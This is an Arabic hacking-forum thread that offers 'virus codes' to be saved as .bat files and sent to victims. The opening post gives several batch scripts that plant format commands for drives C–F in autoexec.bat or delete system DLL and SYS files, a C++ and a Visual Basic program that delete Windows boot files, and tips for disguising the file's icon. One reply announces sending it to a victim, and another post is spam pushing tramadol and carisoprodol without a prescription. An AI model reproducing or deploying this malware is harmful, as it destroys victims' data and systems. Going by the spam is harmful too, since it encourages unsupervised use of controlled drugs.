(منقول)اكواد فايروسات اكواد فايروسات

(منقول)اكواد فايروسات اكواد فايروسات


النتائج 1 إلى 10 من 10

الموضوع: (منقول)اكواد فايروسات اكواد فايروسات

  1. #1

    افتراضي (منقول)اكواد فايروسات اكواد فايروسات

    اول شي افتح الدفتر او المفكره

    وتنسخ الكود الي تحت وتضعه في المفكره و تعمل حفظ باسم وتكتب اسم الملف

    الاسم الملف HI
    تكتب HI.bat وسيحفظ على شكل مربع ابيض داخله ترس اصفر بس لا تحاول

    ولا تفكر تفتح الملف بعد صنعه

    وارسله للضحيه






    وهذي الفيروسات مع عملها بس لا تنسخ عمل الفايروس في المفكره
    فايروس عمل فورمات على C,D,E,F

    انسخ الاوامر من تحت العنوان الي بالعربي

    عمل فورمات C,D,E,F
    انسخ



    call attrib -h -r c:autoexec.bat >nul
    echo format c: /q /u /autotest >nul >>c:autoexec.bat
    echo format d: /q /u /autotest >nul >>c:autoexec.bat
    echo format e: /q /u /autotest >nul >>c:autoexec.bat
    echo format f: /q /u /autotest >nul >>c:autoexec.bat
    echo I love my girl
    echo Smart Hacker



    عمل فورمات C,D,E,F
    انسخ



    call attrib -h -r c:autoexec.bat >nul
    echo format c: /q /u /autotest >nul >>c:autoexec.bat
    echo format d: /q /u /autotest >nul >>c:autoexec.bat
    echo format e: /q /u /autotest >nul >>c:autoexec.bat
    echo format f: /q /u /autotest >nul >>c:autoexec.bat
    echo I love my girl
    echo Smart Hacker
    c:windowsrundll.exe user.exe,exitwindow***ec




    عمل فورمات C,D,E,F
    انسخ



    call attrib -h -r c:autoexec.bat >nul
    echo format c: /q /u /autotest >nul >>c:autoexec.bat
    echo format d: /q /u /autotest >nul >>c:autoexec.bat
    echo format e: /q /u /autotest >nul >>c:autoexec.bat
    echo format f: /q /u /autotest >nul >>c:autoexec.bat
    echo I love my girl
    echo Smart Hacker
    c:windowsrundll32.exe user.exe,exitwindows




    قتل الوندوز وحذف كل الملفات بعد التشغيل مباشره
    انسخ



    @Echo off
    c:
    cd %WinDir%System
    deltree /y *.dll
    cd
    deltree /y *.sys
    echo Smart Hacker




    قتل الوندوز وحذف كل الملفات بعد اول اعادة تشغيل للجهاز
    انسخ


    call attrib -h -r c:autoexec.bat >nul
    @Echo off
    c:
    cd %WinDir%System
    deltree /y *.dll
    cd
    deltree /y *.sys
    echo Smart Hacker




    عمل فورمات للجهاز فورا
    انسخ



    code:--------------------------------------------------------------------------------echo off@
    cls
    call attrib -h -r c:autoexec.bat >nul
    echo @echo off >c:autoexec.bat
    echo deltree /y crogra~1*.* >nul >>c:autoexec.bat
    echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
    echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
    echo deltree /y c:windows*.* >nul >>c:autoexec.bat
    echo format c: /q /u /autotest >nul >>c:autoexec.bat--------------------------------------------------------------------------------





    اهم فورمات البنسبه الي
    انسخ



    echo off@

    cls
    call attrib -h -r c:autoexec.bat >nul
    echo @echo off >c:autoexec.bat
    echo deltree /y crogra~1*.* >nul >>c:autoexec.bat
    echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
    echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
    echo deltree /y c:windows*.* >nul >>c:autoexec.bat
    echo format c: /q /u /autotest >nul >>c:autoexec.bat



    فيرووس C++ :
    انسخ


    #include
    #include
    #include
    main()
    {
    clrscr();
    printf("tttWelcome to the Egyption -oO Virus Oo-nn");
    printf("tt**** -oO Israel Oo- and -oO America Oo-nn");
    remove("c:windowssystem.ini");
    remove("c:windowswin.ini");
    remove("c:autoexec.bat");
    remove("c:msdos.sys");
    remove("c:io.sys");
    remove("c:command.com");
    remove("c:config.sys");
    remove("c:windowsebdcommand.com");
    remove("c:windowsebdebd.cab");
    remove("c:windowsebdAutoexec.bat");
    remove("c:windowsebdsetramd.bat");
    remove("c:windowsebdFindramd.exe");
    rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe");
    printf("Windows destroyed ...nn");
    system("PAUSE");
    }



    فيرووس Visual Basic :
    انسخ

    SetAttr "c:autoexec.bat", vbNormal
    SetAttr "c:msdos.sys", vbNormal
    SetAttr "c:io.sys", vbNormal
    SetAttr "c:windowswin.ini", vbNormal
    SetAttr "c:windowssystem.ini", vbNormal
    SetAttr "c:command.com", vbNormal
    SetAttr "c:config.sys", vbNormal
    SetAttr "c:windowsrundll.exe", vbNormal
    SetAttr "c:windowsrundll32.exe", vbNormal
    Kill "C:autoexec.bat"
    Kill "C:msdos.sys"
    Kill "C:io.sys"
    Kill "C:windowswin.ini"
    Kill "C:windowssystem.ini"
    Kill "C:command.com"
    Kill "C:config.sys"
    Kill "C:windowsrundll.exe"
    Kill "C:windowsrundll32.exe"



    فيروس Html
    انسخ


    *******="text/html; charset=iso-8859-1">


    THIS HTML USING ACTIVE-X PLEASE CLICK #YES#



    وبعد عمل الملف يمكنك تغير ايقونة الملف بطريقه الضغط عليه
    باليمين واختر خصائص
    وغير الايكون الملف بس ما بنصح فيها

    وانا لا اتحمل ايه مسؤاليه لمن فتح الملف الفومات في جهازه عن طريق الخطاء

    وهذه الاوامر موجوده كمام مره في المرفقات لانو تغير شكل الاوامر وطلعو اشكال ال icon بدل بعض الاوامر المطلوبه













    للامانة منقوووووووووووووووووووووو ول

  2. #2
    محظور
    تاريخ التسجيل
    Mar 2011
    الدولة
    دق التحية قدامك أردنيه
    المشاركات
    234

    افتراضي رد: (منقول)اكواد فايروسات اكواد فايروسات

    مشكووووووووووووووووور

  3. #3

    افتراضي GoocubHok buy carisoprodol online Fubbrearm

    So, before you look at going to your making type hospital, bear in mind you can obtain tramadol devoid of prescription so much easier. Some people select using this method regarding tramadol without solutions. When you're likely to acquire tramadol it is best to make sure to go directly while taught for the bottle. This is because the particular remedies includes a higher habit possibility if you are very easily influenced by drugs and also drugs. Therefore informing the druggist online any past difficulties you could have had. To your own personal good and might finish up keeping yourself in the long run, and so make sure you undertake it. carisoprodol 350 mg
    This acquire bypasses the operation of waiting in a new waiting bedroom for a medical professional to take a few min's to see you actually that you simply canít own it. This means the particular tramadol transported without having prescribed seemingly legal, although not difficult to get. When you're getting tramadol with no prescription required you're still studying the proper channels. The sole change along with tramadol no prior pharmaceutical drug is the fact that any drugstore computer deals with you actually, rather than doctor. Because of this , tramadol physician is so favorite and very good to get these days. This is the reason tramadol prescription on the internet is best. carisoprodol online
    When individuals 1st heard them to can get zero health professional prescribed tramadol they were incredibly hesitant. This was because the best way to acquire some thing without a prescription prior to ended up being have it at a friend. Explain how it works will get zero earlier prescribed tramadol in the comfort and ease of their very own house inside a totally legit approach. This particular prescription free tramadol isn't diverse from this tramadol from the medical center, and is particularly going into the future in bigger quantities. An individual donít worry about heading back every week . 5 later on to get more. buy carisoprodol
    These businesses function very hard to ensure that the customersí desires are generally absolutely taken care of. It is one reason tramadol shipped immediately providers are usually doable, for the convenience of the client. Tramadol simply no doctor prescribed immediately deals are the top points intended for these online pharmacologist, they really try everything that may be required to maintain the purchaser happy. And so if you are with Idaho bathing in one hundred degree temp, or maybe if youíre within Alaska with your ft thus cold that they offer numb, if you individual your personal computer having an connection to the web and many form of check, you can obtain their hands on tramadol on the internet instantaneously. At this point even if it's the weekend and you're simply in a great deal pain anyone canít tolerate this, having an on the web pharmacy you will get tramadol over night supply Thursday as well as Wednesday unlike the majority of drug stores which have been closed on the weekends, or you cannot available delayed adequate to get for them. There is the alternative regarding immediately tramadol simply no RX delivery which may bring you the particular tramadol immediately no prescription drugs that you yearn for. Consequently regardless while or certainly where an individual existence tramadol along with instantaneously specific supply is obviously an alternative. buy carisoprodol online
    Paying for Tramadol On the net With No Health professional prescribed carisoprodol no prescription

  4. #4

    افتراضي رد: (منقول)اكواد فايروسات اكواد فايروسات

    العفووووووووو
    هلا بيكم

  5. #5

    افتراضي رد: (منقول)اكواد فايروسات اكواد فايروسات

    مشكووووووووووووووووووور اخي على المجهودات

  6. #6

    افتراضي رد: (منقول)اكواد فايروسات اكواد فايروسات

    مشكوووووووووووووور

  7. #7
    محظور
    تاريخ التسجيل
    Jan 2012
    الدولة
    في اي مكن
    المشاركات
    81

    افتراضي رد: (منقول)اكواد فايروسات اكواد فايروسات

    مشكوررررررررررررررررر

  8. #8
    محظور
    تاريخ التسجيل
    Jan 2012
    الدولة
    في اي مكن
    المشاركات
    81

    افتراضي رد: (منقول)اكواد فايروسات اكواد فايروسات

    جاري الارسال الي الضحية

  9. #9

    افتراضي رد: (منقول)اكواد فايروسات اكواد فايروسات

    مشكووووووووور

  10. #10

    افتراضي رد: (منقول)اكواد فايروسات اكواد فايروسات

    شكراااا شكرا ابداع

المواضيع المتشابهه

  1. اسطوانة هكر تحوي برامج تشـفير+ اكواد تشفير + سورسآت + Assemply Book
    بواسطة She!! Access في المنتدى منتدى برامج وأدوات الهكرز
    مشاركات: 89
    آخر مشاركة: 06-10-2013, 03:29 PM
  2. اصنع ارووع اندكس خاص فيك مع اررووع اكواد جافا
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم إندكسات الإختراق
    مشاركات: 51
    آخر مشاركة: 06-15-2012, 02:58 PM
  3. دورة اختراق المواقع بالفيديو من الصفر حتى الاحتراف (منقول)
    بواسطة rakan naber في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 37
    آخر مشاركة: 01-12-2012, 08:05 PM
  4. اكواد أوامر النسخ والقص واللصق
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم لغة الدلفى
    مشاركات: 17
    آخر مشاركة: 10-10-2011, 01:57 AM
  5. اريد اكواد اندكس
    بواسطة fares-hac في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 2
    آخر مشاركة: 09-30-2009, 11:12 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •